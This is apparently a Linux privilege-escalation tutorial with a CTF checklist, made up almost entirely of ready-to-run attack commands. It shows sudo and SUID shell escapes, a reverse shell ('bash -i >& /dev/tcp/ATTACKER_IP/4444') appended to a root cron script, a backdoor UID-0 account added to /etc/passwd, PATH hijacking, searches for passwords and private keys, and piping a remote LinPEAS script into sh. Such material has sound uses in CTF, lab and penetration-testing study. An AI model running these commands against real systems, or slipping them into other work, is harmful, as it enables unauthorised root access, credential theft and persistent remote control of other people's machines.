What is Privilege Escalation?
After gaining initial access to a system (usually as a regular user), the goal is to become root. This process is called privilege escalation (privesc).
Initial Reconnaissance
# Who are we?
id
whoami
# What OS and kernel version?
uname -a
cat /etc/os-release
# What can we run with sudo?
sudo -l
# Other users
cat /etc/passwd | grep -v nologin
# Where are we?
pwd
ls -la
1. Sudo Without a Password
sudo -l
If we see something like:
(ALL) NOPASSWD: /usr/bin/vim
Launch vim and get a shell from it:
sudo vim -c ':!/bin/bash'
GTFOBins — site with techniques for hundreds of binaries:
https://gtfobins.github.io/
Just find the binary in the list and copy the command.
2. SUID Bits
SUID (Set User ID) — the file runs with the owner's privileges, not those of the person executing it.
# Find all SUID files
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
Classic example — /bin/bash with SUID:
# If bash has SUID root
/bin/bash -p
find with SUID:
find . -exec /bin/bash -p \; -quit
nmap (older versions):
nmap --interactive
nmap> !sh
Check all discovered SUID files on GTFOBins.
3. Cron Jobs
Cron jobs running as root are a goldmine for privesc.
# System crontab
cat /etc/crontab
# Cron directories
ls -la /etc/cron*
# Cron logs (may show what's running)
cat /var/log/cron.log 2>/dev/null
grep "CRON" /var/log/syslog 2>/dev/null
Attack scenario: A script runs as root every minute, but the script file is writable by us.
# Check file permissions
ls -la /opt/cleanup.sh
# If writable — add a reverse shell
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh
# Wait on your listener
nc -lvnp 4444
4. Writable /etc/passwd
ls -la /etc/passwd
If the file is writable — we can add a new root user:
# Generate a password hash for "hacked"
openssl passwd -1 -salt salt hacked
# $1$salt$...
# Add an entry with UID=0
echo 'hacker:$1$salt$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
# Log in
su hacker
5. PATH Hijacking
If a SUID program calls other commands without the full path:
# Find what the program calls
strings /usr/local/bin/suid_program
# If it calls "service" without /usr/sbin/service
# Create our own "service" in /tmp
echo '#!/bin/bash' > /tmp/service
echo 'bash -p' >> /tmp/service
chmod +x /tmp/service
# Modify PATH
export PATH=/tmp:$PATH
# Run the vulnerable program
/usr/local/bin/suid_program
6. Weak Passwords and Reuse
# Search for passwords in files
grep -r "password" /var/www/ 2>/dev/null
grep -r "passwd" /etc/ 2>/dev/null
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
# Files with private keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
Automation: LinPEAS
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or serve via HTTP server
# On the attacking machine:
python3 -m http.server 8080
# On the target:
curl http://ATTACKER:8080/linpeas.sh | sh
LinPEAS highlights critical findings in red/yellow — focus on those.
CTF Checklist
- [ ]
sudo -l— what can we run? - [ ]
find / -perm -4000 2>/dev/null— SUID files - [ ]
cat /etc/crontab+/etc/cron*— cron jobs - [ ] Passwords in config files and history
- [ ] Writable files executed as root
- [ ] Kernel version → search for public exploits
- [ ] LinPEAS for automated analysis